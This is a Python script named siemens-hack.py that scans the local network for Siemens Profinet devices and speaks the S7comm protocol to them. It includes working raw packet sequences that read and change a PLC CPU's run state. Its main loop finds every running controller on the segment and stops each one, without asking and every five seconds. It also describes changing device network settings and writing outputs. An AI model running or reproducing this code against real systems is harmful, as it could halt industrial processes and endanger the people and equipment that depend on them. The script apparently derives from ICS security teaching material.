Files
Gist/siemens-hack.py
2024-09-02 19:26:16 +02:00

485 lines
22 KiB
Python

#! /usr/bin/env python3
r"""
Copyright 2022 Photubias(c)
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WAR
RANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
(Buggy) Linux implementation of this script: https://code.google.com/p/scada-tools/
python profinet_scanner.py [-i interface]
DLL Library import based on: https://code.google.com/p/winpcapy/
Prerequisites: WinPcap (Windows) or libpcap (Linux) installed
File name SiemensScan.py
written by tijl[dot]deneut[at]howest[dot]be for IC4
--- Profinet Scanner ---
It will perform a Layer2 discovery scan (PN_DCP) for Profinet devices,
then list their info (detected only via DCP)
Then give you the option to change network settings for any of them
--- Siemens Hacker ---
It also performs detailed scanning using S7Comm.
Furthermore, this script reads inputs AND writes & reads outputs.
"""
import os
import re
import socket
import string
import struct
import sys
import time
from binascii import hexlify, unhexlify
from ctypes import CDLL, POINTER, Structure, c_void_p, c_char_p, c_ushort, c_char, c_long, c_int, c_ubyte, \
byref, create_string_buffer
from ctypes.util import find_library
from multiprocessing.pool import ThreadPool
from pprint import pprint
from subprocess import Popen, PIPE
##### Classes
class Sockaddr(Structure):
_fields_ = [("sa_family", c_ushort),
("sa_data", c_char * 14)]
class PcapAddr(Structure):
pass
PcapAddr._fields_ = [('next', POINTER(PcapAddr)),
('addr', POINTER(Sockaddr)),
('netmask', POINTER(Sockaddr)),
('broadaddr', POINTER(Sockaddr)),
('dstaddr', POINTER(Sockaddr))]
class PcapIf(Structure):
pass
PcapIf._fields_ = [('next', POINTER(PcapIf)),
('name', c_char_p),
('description', c_char_p),
('addresses', POINTER(PcapAddr)),
('flags', c_int)]
class Timeval(Structure):
pass
Timeval._fields_ = [('tv_sec', c_long),
('tv_usec', c_long)]
class PcapPkthdr(Structure):
_fields_ = [('ts', Timeval),
('caplen', c_int),
('len', c_int)]
##### Initialize Pcap
if os.name == 'nt':
try:
os.chdir('C:/Windows/System32/Npcap')
_lib = CDLL('wpcap.dll')
except:
print('Error: WinPcap/Npcap not found!')
print('Please download here: https://nmap.org/npcap/')
input('Press [Enter] to close')
sys.exit(1)
else:
pcaplibrary = find_library('pcap')
if pcaplibrary is None or str(pcaplibrary) == '':
print('Error: Pcap library not found!')
print('Please install with: e.g. apt install libpcap0.8')
input('Press [Enter] to close')
sys.exit(1)
_lib = CDLL(pcaplibrary)
## match DLL function to list all devices
pcap_findalldevs = _lib.pcap_findalldevs
pcap_findalldevs.restype = c_int
pcap_findalldevs.argtypes = [POINTER(POINTER(PcapIf)), c_char_p]
## match DLL function to open a device: char *device, int snaplen, int prmisc, int to_ms, char *ebuf
## snaplen - maximum size of packets to capture in bytes
## promisc - set card in promiscuous mode?
## to_ms - time to wait for packets in miliseconds before read times out
## errbuf - if something happens, place error string here
pcap_open_live = _lib.pcap_open_live
pcap_open_live.restype = POINTER(c_void_p)
pcap_open_live.argtypes = [c_char_p, c_int, c_int, c_int, c_char_p]
## match DLL function to send a raw packet: pcap device handle, packetdata, packetlength
pcap_sendpacket = _lib.pcap_sendpacket
pcap_sendpacket.restype = c_int
pcap_sendpacket.argtypes = [POINTER(c_void_p), POINTER(c_ubyte), c_int]
## match DLL function to close a device
pcap_close = _lib.pcap_close
pcap_close.restype = None
pcap_close.argtypes = [POINTER(c_void_p)]
## match DLL function to get error message
pcap_geterr = _lib.pcap_geterr
pcap_geterr.restype = c_char_p
pcap_geterr.argtypes = [POINTER(c_void_p)]
## match DLL function to get next packet
pcap_next_ex = _lib.pcap_next_ex
pcap_next_ex.restype = c_int
pcap_next_ex.argtypes = [POINTER(c_void_p), POINTER(POINTER(PcapPkthdr)), POINTER(POINTER(c_ubyte))]
##### Variables
iDiscoverTimeout = 2
##### Functions
def get_all_interfaces():
def add_to_arr(array, adapter, ip, mac, device, winguid):
if len(mac) == 17: # When no or bad MAC address (e.g. PPP adapter), do not add
array.append([adapter, ip, mac, device, winguid])
return array
# Returns twodimensional array of interfaces in this sequence for each interface:
# [0] = adaptername (e.g. Ethernet or eth0)
# [1] = Current IP (e.g. 192.168.0.2)
# [2] = Current MAC (e.g. ff:ee:dd:cc:bb:aa)
# [3] = Devicename (e.g. Intel 82575LM, Windows only)
# [4] = DeviceGUID (e.g. {875F7EDB-CA23-435E-8E9E-DFC9E3314C55}, Windows only)
interfaces = []
if os.name == 'nt': # This should work on Windows
proc = Popen("getmac /NH /V /FO csv | FINDSTR /V disconnected", shell=True, stdout=PIPE)
for interface in proc.stdout.readlines():
intarr = interface.decode().split(',')
adapter = intarr[0].replace('"', '')
devicename = intarr[1].replace('"', '')
mac = intarr[2].replace('"', '').lower().replace('-', ':')
winguid = intarr[3].replace('"', '').replace('\n', '').replace('\r', '')[-38:]
proc = Popen('netsh int ip show addr "' + adapter + '" | FINDSTR /I IP', shell=True, stdout=PIPE)
try:
ip = re.findall(r'[0-9]+(?:\.[0-9]+){3}',
proc.stdout.readlines()[0].decode(errors='ignore').replace(' ', ''))[0]
except:
ip = ''
interfaces = add_to_arr(interfaces, adapter, ip, mac, devicename, winguid)
else: # And this on any Linux
# proc=Popen("for i in `ifconfig -a | grep \"Link encap:\" | awk '{print $1}'`;do echo \"$i `ifconfig $i | sed 's/inet addr:/inet addr: /' | grep \"inet addr:\" | awk '{print $3}'` `ifconfig $i | grep HWaddr | awk '{print $5}'`\" | sed '/lo/d';done", shell=True, stdout=PIPE)
proc = Popen(
"for i in $(ip address | grep -v \"lo\" | grep \"default\" | cut -d\":\" -f2 | cut -d\" \" -f2);do echo $i $(ip address show dev $i | grep \"inet \" | cut -d\" \" -f6 | cut -d\"/\" -f1) $(ip address show dev $i | grep \"ether\" | cut -d\" \" -f6);done",
shell=True, stdout=PIPE)
for interface in proc.stdout.readlines():
intarr = interface.decode().split(' ')
if len(intarr) < 3: continue ## Device has no MAC address, L2 scanning not an option
interfaces = add_to_arr(interfaces, intarr[0], intarr[1], intarr[2].replace('\n', ''), '', '')
return interfaces
## Expects sData like this 01020304050607 and returns bytearray
def create_packet(s_data):
b_hex_data = unhexlify(s_data)
arr_byte_packet = (c_ubyte * len(b_hex_data))()
b = bytearray()
b.extend(b_hex_data)
for i in range(0, len(b_hex_data)): arr_byte_packet[i] = b[i]
return arr_byte_packet
## Actually sends a packet
def send_raw_packet(b_npfdevice, s_ethertype, s_srcmac, bool_set_network=False, s_network_data_to_set='', s_dstmac=''):
if s_ethertype == '88cc': # LLDP Packet
s_dstmac = '0180c200000e'
s_data = '0210077365727665722d6e6574776f726b6d040907706f72742d303031060200140a0f5345525645522d4e4554574f524b4d0c60564d776172652c20496e632e20564d77617265205669727475616c20506c6174666f726d2c4e6f6e652c564d776172652d34322033362036642039622034302062642038642038302d66302037362061312066302035332030392039352032370e040080008010140501ac101e660200000001082b0601040181c06efe08000ecf0200000000fe0a000ecf05005056b6feb6fe0900120f0103ec0300000000'
elif s_ethertype == '8100': # PN-DCP, Profinet Discovery Packet, sEthertype '8100'
s_dstmac = '010ecf000000'
s_data = '00008892fefe05000400000300800004ffff00000000000000000000000000000000000000000000000000000000'
elif s_ethertype == '8892' and bool_set_network:
## Create packet to set networkdata, expect data in hexstring
s_data = (
'fefd 04 00 04000001 0000 0012 0102 000e 0001' + s_network_data_to_set + '0000 0000 0000 0000 0000 0000').replace(
' ', '') # Working
elif s_ethertype == '8892' and not bool_set_network:
## Create custom packet with 'networkDataToSet' as the data (including length) and dstmac as dstmac
s_data = s_network_data_to_set
## Get packet as a bytearray
arr_byte_packet = create_packet(s_dstmac + s_srcmac + s_ethertype + s_data)
## Send the packet
buf_errbuf = create_string_buffer(256)
handle_pcap_dev = pcap_open_live(b_npfdevice, 65535, 1, 1000,
buf_errbuf) ## Device, max packet size, promiscuous mode, time limit in ms, buffer for errors
if not bool(handle_pcap_dev):
print('\nError: Please use sudo!\n')
# else: print('\nUnable to open the adapter. %s is not supported by Pcap\n' % interfaces[int(answer - 1)][0])
sys.exit(1)
if pcap_sendpacket(handle_pcap_dev, arr_byte_packet, len(arr_byte_packet)) != 0:
print('\nError sending the packet: %s\n' % pcap_geterr(handle_pcap_dev))
sys.exit(1)
pcap_close(handle_pcap_dev)
return arr_byte_packet
## Receive packets, expect device to receive on, src mac address + ethertype to filter on and timeout in seconds
def receive_raw_packets(b_npfdevice, i_timeout, s_srcmac, s_ethertype, stop_on_receive=False):
arr_received_raw_data = []
buf_errbuf = create_string_buffer(256)
handle_pcap_dev = pcap_open_live(b_npfdevice, 65535, 1, 1000,
buf_errbuf) ## Device, max packet size, promiscuous mode, time limit in ms, buffer for errors
if not bool(handle_pcap_dev):
print('\nUnable to open the adapter. {} is not supported by Pcap\n'.format(b_npfdevice))
sys.exit(1)
ptr_header = POINTER(PcapPkthdr)()
ptr_pkt_data = POINTER(c_ubyte)()
i_receivedpacket = pcap_next_ex(handle_pcap_dev, byref(ptr_header), byref(ptr_pkt_data))
## Regular handler, loop until told otherwise (or with timer)
fl_timer = time.time() + int(i_timeout)
i = 0
while i_receivedpacket >= 0:
i_timeleft = int(round(fl_timer - time.time(), 0))
status('Received packets: %s, time left: %i \r' % (str(i), i_timeleft))
if i_timeleft <= 0: break ## PCAP networkstack timeout elapsed or regular timeout
lst_rawdata = ptr_pkt_data[0:ptr_header.contents.len]
s_packettype = hexlify(bytearray(lst_rawdata[12:14])).decode().lower()
s_targetmac = hexlify(bytearray(lst_rawdata[:6])).decode().lower()
if s_packettype == s_ethertype.lower() and s_srcmac.lower() == s_targetmac:
# print('Succes! Found an %s packet.' % sEthertype)
arr_received_raw_data.append(lst_rawdata)
if stop_on_receive: break
## Load next packet
i_receivedpacket = pcap_next_ex(handle_pcap_dev, byref(ptr_header), byref(ptr_pkt_data))
i += 1
pcap_close(handle_pcap_dev)
return arr_received_raw_data
## Parsing the Raw PN_DCP data on discovery (source: https://code.google.com/p/scada-tools/source/browse/profinet_scanner.py)
## Returns type_of_station, name_of_station, vendor_id, device_id, device_role, ip_address, subnet_mask, standard_gateway
def parse_response(s_hexdata, s_mac):
arr_device = {
'mac_address': s_mac,
'type_of_station': 'None',
'name_of_station': 'None',
'vendor_id': 'None',
'device_id': 'None',
'device_role': 'None',
'ip_address': 'None',
'subnet_mask': 'None',
'standard_gateway': 'None',
'hardware': None,
'firmware': None,
}
## Since this is the parse of a DCP identify response, data should start with feff (Profinet FrameID 0xFEFF)
if not str(s_hexdata[:4]).lower() == 'feff':
print('Error: this data is not a proper DCP response?')
return arr_device
data_to_parse = s_hexdata[24:] # (Static) offset to where first block starts
while len(data_to_parse) > 0:
## Data is divided into blocks, where block length is set at byte 2 & 3 (so offset [4:8]) of the block
block_length = int(data_to_parse[2 * 2:4 * 2], 16)
block = data_to_parse[:(4 + block_length) * 2]
## Parse the block
block_id = str(block[:2 * 2])
if block_id == '0201':
arr_device['type_of_station'] = str(unhexlify(block[4 * 2:4 * 2 + block_length * 2]))[2:-1].replace(r'\x00',
'')
elif block_id == '0202':
arr_device['name_of_station'] = str(unhexlify(block[4 * 2:4 * 2 + block_length * 2]))[2:-1].replace(r'\x00',
'')
elif block_id == '0203':
arr_device['vendor_id'] = str(block[6 * 2:8 * 2])
arr_device['device_id'] = str(block[8 * 2:10 * 2])
elif block_id == '0204':
arr_device['device_role'] = str(block[6 * 2:7 * 2])
devrole = ''
elif block_id == '0102':
arr_device['ip_address'] = socket.inet_ntoa(struct.pack(">L", int(block[6 * 2:10 * 2], 16)))
arr_device['subnet_mask'] = socket.inet_ntoa(struct.pack(">L", int(block[10 * 2:14 * 2], 16)))
arr_device['standard_gateway'] = socket.inet_ntoa(struct.pack(">L", int(block[14 * 2:18 * 2], 16)))
## Maintain the loop
padding = block_length % 2 # Will return 1 if odd
data_to_parse = data_to_parse[(4 + block_length + padding) * 2:]
return arr_device
def status(msg):
sys.stderr.write(msg)
sys.stderr.flush()
def send_and_recv(sock, strdata, sendOnly=False):
data = unhexlify(strdata.replace(' ', '').lower()) ## Convert to real HEX (\x00\x00 ...)
sock.send(data)
if sendOnly: return
ret = sock.recv(65000)
return ret
def get_cpu(device):
s_statee = 'Running'
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(1) # 1 second timeout
try:
sock.connect((device['ip_address'], 102)) ## Will setup TCP/SYN with port 102
except:
return 'Unknown'
# Firstly: the COTP Connection Request (CR), should result in Connection Confirm (CC)
## TPKT header + COTP CR TPDU with src-ref 0x0005 (gets response with dst-ref 0x0005)
cotpconnectresponse = hexlify(send_and_recv(sock, '03000016' + '11e00000001d00c1020100c2020100c0010a')).decode(
errors='ignore')
## Response should be 03000016 11d00005001000c0010ac1020600c2020600
if not cotpconnectresponse[10:12] == 'd0':
print('COTP Connection Request failed')
return ''
##---- S7 Setup Comm ------------
## TPKT header + COTP header + S7 data (which is: Header -Job- + Parameter -Setup-)
s7setupdata = '32010000020000080000' + 'f0000001000101e0'
tpktlength = str(hex(int((len(s7setupdata) + 14) / 2)))[2:]
s7setup = send_and_recv(sock, '030000' + tpktlength + '02f080' + s7setupdata)
##---- S7 Request CPU -----------
s7readdata = '3207000005000008 000800011204 11440100ff09000404240001'
tpktlength = str(hex(int((len(s7readdata.replace(' ', '')) + 14) / 2)))[2:]
s7read = send_and_recv(sock, '030000' + tpktlength + '02f080' + s7readdata)
if hexlify(s7read[44:45]).decode(errors='ignore') == '03': s_statee = 'Stopped'
sock.close()
return s_statee
def change_cpu(device):
cur_state = get_cpu(device)
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(1)
sock.connect((device['ip_address'], 102)) ## Will setup TCP/SYN with port 102
## CR TPDU
send_and_recv(sock, '03000016' + '11e00000002500c1020600c2020600c0010a')
## 'SubscriptionContainer'
sResp = hexlify(send_and_recv(sock,
'030000c0' + '02f080' + '720100b131000004ca0000000200000120360000011d00040000000000a1000000d3821f0000a3816900151653657276657253657373696f6e5f4536463534383534a3822100150b313a3a3a362e303a3a3a12a3822800150d4f4d532b204465627567676572a38229001500a3822a001500a3822b00048480808000a3822c001211e1a300a3822d001500a1000000d3817f0000a38169001515537562736372697074696f6e436f6e7461696e6572a2a20000000072010000')).decode(
errors='ignore')
s_sid = str(hex(int('0' + sResp[48:50], 16) + int('80', 16))).replace('0x', '')
if len(s_sid) % 2 == 1: s_sid = '0' + s_sid
# print('Using SID ' + sSID)
if cur_state == 'Stopped': ## Will perform start
send_and_recv(sock,
'03000078' + '02f080' + '72020069310000054200000003000003' + s_sid + '34000003 ce 010182320100170000013a823b00048140823c00048140823d000400823e00048480c040823f0015008240001506323b313035388241000300030000000004e88969001200000000896a001300896b000400000000000072020000')
else:
send_and_recv(sock,
'03000078' + '02f080' + '72020069310000054200000003000003' + s_sid + '34000003 88 010182320100170000013a823b00048140823c00048140823d000400823e00048480c040823f0015008240001506323b313035388241000300030000000004e88969001200000000896a001300896b000400000000000072020000')
send_and_recv(sock,
'0300002b' + '02f080' + '7202001c31000004bb00000005000003' + s_sid + '34000000010000000000000000000072020000')
send_and_recv(sock,
'0300002b' + '02f080' + '7202001c31000004bb00000006000003' + s_sid + '34000000020001010000000000000072020000')
runloop = True
print('--- Getting data ---')
while runloop:
try:
response = sock.recv(65000)
except:
runloop = False
try:
send_and_recv(sock,
'03000042' + '02f080' + '7202003331000004fc00000007000003' + s_sid + '360000003402913d9b1e000004e88969001200000000896a001300896b00040000000000000072020000')
except:
sock.close()
return False
if cur_state == 'Stopped': ## Will perform start
send_and_recv(sock,
'03000043' + '02f080' + '7202003431000004f200000008000003' + s_sid + '36000000340190770008 03 000004e88969001200000000896a001300896b00040000000000000072020000')
else:
send_and_recv(sock,
'03000043' + '02f080' + '7202003431000004f200000008000003' + s_sid + '36000000340190770008 01 000004e88969001200000000896a001300896b00040000000000000072020000')
send_and_recv(sock,
'0300003d' + '02f080' + '7202002e31000004d40000000a000003' + s_sid + '34000003d000000004e88969001200000000896a001300896b000400000000000072020000')
sock.close()
return True
def scan_network(s_adapter, s_macaddr, s_winguid):
## We use Pcap, so we need the Pcap device (for Windows: \Device\NPF_{GUID}, for Linux: 'eth0')
if os.name == 'nt': s_adapter = r'\Device\NPF_' + s_winguid
# print('Using adapter ' + sAdapter + '\n')
b_npfdevice = s_adapter.encode()
## Start building discovery packet
print('Building packet')
## Sending the raw packet (packet itself is returned) (8100 == PN_DCP, 88cc == LDP)
packet = send_raw_packet(b_npfdevice, '8100', s_macaddr)
print('\nPacket has been sent (' + str(len(packet)) + ' bytes)')
## Receiving packets as bytearr (88cc == LDP, 8892 == device PN_DCP)
print('\nReceiving packets over ' + str(iDiscoverTimeout) + ' seconds ...\n')
received_data_arr = receive_raw_packets(b_npfdevice, iDiscoverTimeout, s_macaddr, '8892')
print()
print('\nSaved ' + str(len(received_data_arr)) + ' packets')
print()
return received_data_arr, b_npfdevice
def parse_data(received_data_arr):
# print('These are the devices detected ({}):'.format(len(receivedDataArr)))
# print('{0:17} | {1:20} | {2:20} | {3:15} | {4:9}'.format('MAC address', 'Device', 'Device Type', 'IP Address', 'Vendor ID'))
lst_devices = []
for packet in received_data_arr:
s_hexdata = hexlify(bytearray(packet))[28:].decode(errors='ignore') # take off ethernet header
## Parse function returns type_of_station, name_of_station, vendor_id, device_id, device_role, ip_address, subnet_mask, standard_gateway
## takes 'translate' as a parameter, which will add these parsings:
## (vendor id 002a == siemens) (device id 0a01=switch, 0202=simulator, 0203=s7-300 CP, 0101=s7-300 ...)
## (0x01==IO-Device, 0x02==IO-Controller, 0x04==IO-Multidevice, 0x08==PN-Supervisor), (0000 0001, 0000 0010, 0000 0100, 0000 1000)
## Getting MAC address from packet, formatting with ':' in between
s_mac = ':'.join(re.findall('(?s).{,2}', str(hexlify(bytearray(packet)).decode(errors='ignore')[6 * 2:12 * 2])))[
:-1]
arr_result = parse_response(s_hexdata, s_mac)
lst_devices.append(arr_result)
# sDevicename = str(arrResult['name_of_station'])
# if sDevicename == '': sDevicename = str(arrResult['type_of_station'])
# print('{0:17} | {1:20} | {2:20} | {3:15} | {4:9}'.format(sMac, sDevicename, arrResult['type_of_station'], arrResult['ip_address'], arrResult['vendor_id']))
return lst_devices
def main():
interfaces = get_all_interfaces()
s_adapter = interfaces[0][0] # eg: 'Ethernet 2'
s_macaddr = interfaces[0][2].replace(':', '') # eg: 'ab58e0ff585a'
s_winguid = interfaces[0][4] # eg: '{875F7EDB-CA23-435E-8E9E-DFC9E3314C55}'
while True:
received_data_arr, b_npfdevice = scan_network(s_adapter, s_macaddr, s_winguid)
lst_devices = parse_data(received_data_arr)
print(f"Found {len(lst_devices)} devices")
for lst_device in lst_devices:
pprint(lst_device)
print("Stopping all CPUs")
for device in lst_devices:
current_state = get_cpu(device)
if current_state == 'Running':
change_cpu(device)
time.sleep(5)
if __name__ == '__main__':
main()